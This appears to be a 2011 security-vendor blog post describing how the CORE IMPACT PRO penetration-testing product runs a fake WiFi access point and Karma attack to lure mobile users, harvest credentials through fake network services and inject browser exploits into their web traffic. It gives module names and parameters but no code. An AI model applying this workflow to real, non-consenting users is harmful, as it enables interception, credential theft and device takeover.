Pick an Access Point, any Access Point: Assessing Man-in-the-Middle Threats Over WiFi

March 31, 2011

One of the things that I love about working for Core is our freedom to work on things that we are interested in. Instead of being expected to focus 100% on the project du jour and produce x lines of code per day, our exploit developers are given the opportunity to work on those areas that they would spend their evenings and weekends tinkering with.

An example of this that springs to mind is one involving Core Security developer Andrés Blanco. Andrés used to research WiFi from home, so he was a natural fit for the WiFi team when our customers asked us to develop WiFi penetration testing capabilities for IMPACT Pro. Now, every time I ask him what he is working on or what he is thinking about in the world of WiFi, I walk away excited about the current WiFi capabilities and the roadmap for WiFi penetration testing within IMPACT Pro. Often I am amazed at how many issues I thought I had seen the last of in the 90’s have been brought back to life thanks to WiFi.

I asked Andrés to walk us through the new capabilities of IMPACT Pro to create a Fake Access Point to try and lure WiFi clients into connecting to our AP – when this happens we have complete access to all the victims’ traffic and can start performing Man-in-the-Middle attacks against them.

But enough from me – let’s hand things over to Andrés …

- Alex Horan, Sr. Product Manager

----------------------

Thanks Alex, as you know, these days it is a common thing to see employees from corporations using mobile devices (by this, I mean mobile devices is a wide range of devices like for example: notebooks, netbooks, tablets, smartphones, etc.)  to do their daily work. Targeting these mobile devices is a good way to gain access to the target corporate network or to get the necessary credentials from a mobile device in order to impersonate a legitimate user and enter the network. One of the biggest advantages of attacking mobile devices is that any corporate network security protecting a target device evaporates when the device is off the network. Needless to say, in general, employees don't take security measures when they connect to their favorite coffee shop hotspots.

There are several ways of attacking mobile devices. The attack vector that we are going to describe in this article is a MiTM attack, creating a fake Access Point to attract these mobile devices to connect to and use – and by doing so, open themselves up to attack.

Using CORE IMPACT PRO we can perform this attack in two different modes: ICS and Offline. ICS mode lets us share the Internet connection we have to any WiFi victim that connects to the fake Access Point. By allowing access to the Internet for any WiFi victims, we open up the possibility of performing many MiTM attacks; these range from gathering credentials as the victims authenticate to services on the internet to inserting Client-Side exploits into internet traffic going back to the victims. Offline mode does not require or provide the victims with Internet access. Thanks to a recent update, IMPACT Pro can create a fake Internet for you and allow the client to interact with it (Fake DNS Server, FAKE POP3 Server, FAKE SMB Sever, FAKE HTTP Server etc) – each of those will try to extract credentials and other information from any client that connects to it.

Injecting Client-Side exploits on real HTTP traffic is a nice way to hide a web browser exploit, and doing this on CORE IMPACT PRO is pretty easy. I’ll talk more about this after we create the Fake Access Point.

We start by executing the Fake Access Point module; we need to run it on ICS mode. It's recommended to change the default values from the ESSID and BSSID parameters.

Once we have the Fake Access Point module running we need to execute the Fake AP HTTP Client-Side Exploit Injection. This module can be found on WiFi/Attack/Client Attack/Fake Access Point – Karma Attack/MiTM.

The parameters of almost every Fake Access Point – Karma Attack/MitM module are the same.

The module parameters are the following:

  • TARGET: Fake Access Point where module is going to run.
  • MODULE: Client-Side exploit we want to inject.
  • URL-FILTER: URL Filter where we want to inject the exploit.

With this environment set up, we have to wait for the targets to connect to us. However, this will depend on many things. We could attract clients using KARMA feature on Fake Access Point module, but we have to be careful not to attract Stations we don't want to attack.

Let's check what happens on the client side.

The client connects to the Access Point and starts his browser to surf the web.

But if you notice, there’s something funny on the browser screenshot that we have above. Let's talk about what's happening on the background while the user is browsing the web. Every HTTP request we handle through our Access Point is modified on-the-fly and injected with a WBA (Web Browser Agent) that adds an iFrame to the exploit on the DOM of the original page.  The user will never notice a difference in their web browsing experience, but that browser is probably owned by us ...

We can now return to our CORE IMPACT PRO workspace and be very happy with the new IMPACT Agent that has been deployed.

To end this post, I want to add that there are a lot more Fake Access Point MiTM modules that can be used via this attack vector. Happy WiFi hunting!

-  Andrés Blanco, Developer

 

  • Penetration testing

Ready for a Demo?

Eliminate identity-related breaches with SecureAuth!